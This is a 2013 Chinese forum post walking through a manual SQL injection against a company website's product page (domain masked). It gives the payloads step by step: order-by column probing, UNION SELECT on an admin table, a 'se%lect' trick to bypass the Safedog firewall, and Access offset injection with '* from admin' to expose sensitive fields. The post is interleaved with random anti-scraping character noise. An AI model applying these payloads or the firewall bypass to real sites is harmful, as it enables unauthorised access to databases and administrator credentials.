找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2059|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
+ x/ g/ |- Y) x! `0 x# E0 |
6 u* B) v" [8 f6 W) i/ a7 t; F1 f% @) F. o  [; e5 W& F0 w
顺手加个admin, d5 j$ t- }3 D* o1 }. G2 l7 \6 C1 D# v

; ^! R1 P" D  d, \5 q1 N6 i( T3 a* e4 x- \3 z  N( Y
默认后台。
2 Z* H3 x( U( H9 q5 ~1 Q# V回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​, g' I: A7 d* ~: T* \
* V% |0 s$ R7 A* U& W  a

9 ]5 y% O' l% m3 M  L: |/ N& I5 B; t- E, ^  k1 t3 K
所以就不用御剑扫了,待会直接封IP。
+ |* h3 u5 B9 B5 a! |  L   V. P1 C0 j7 Z# r1 ^
用order by语句判断是否存在注入。
6 L' U! B3 e# V- chttp://www.xxx.com /product_show.asp?id=997 order by 1: \2 n; }+ v- L& r
http://www.xxx.com /product_show.asp?id=997 order by 100; {! \* J2 H! O: `
现在存在注入,经测试后发现是9个字段。% J7 S1 Q: H* o; _
- m8 w# ^# G0 F8 x  M8 ]
接下来进行联合查询,猜是否存在admin表。
# a: M7 ]- e/ C% d1 \. d9 ?2 Zhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​1 G. E' p3 H/ R8 h3 V9 q6 g

5 L/ f; O% F' k' ]; _
: t1 U  }& G. i6 |2 C5 I1 G* Z8 o" b6 b* k5 t! _8 ~
在select中间加个%,se%lect绕过安全狗。2 q7 Q0 [$ t5 [  h; w% R

7 C: S! g, \6 _% C& n% E9 r6 B% B1 s+ r" Z
发现存在admin表,然后开始手工猜常用的字段。! N2 T6 K; I+ J8 g
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
2 q: b$ ]4 ]4 `. N% C/ E' I
; O  B& m) z* t6 o突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
5 R$ ?$ Q$ K. l3 d" z0 d- |- ?
3 [$ w% ?) h6 E5 D8 S" q7 u科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
& K) m$ i, M# D1 v  ~8 Whttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin; \  D" _* Q, }7 H, v$ v+ T
好了,敏感内容出显了。​) k  m( y( S' k( Z8 D8 ]6 |

$ U% U2 v- ~( a" i2 h$ \: @5 j/ v4 {) ?* ]" _

& ~0 x" F4 K6 T6 Y1 B8 a- i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表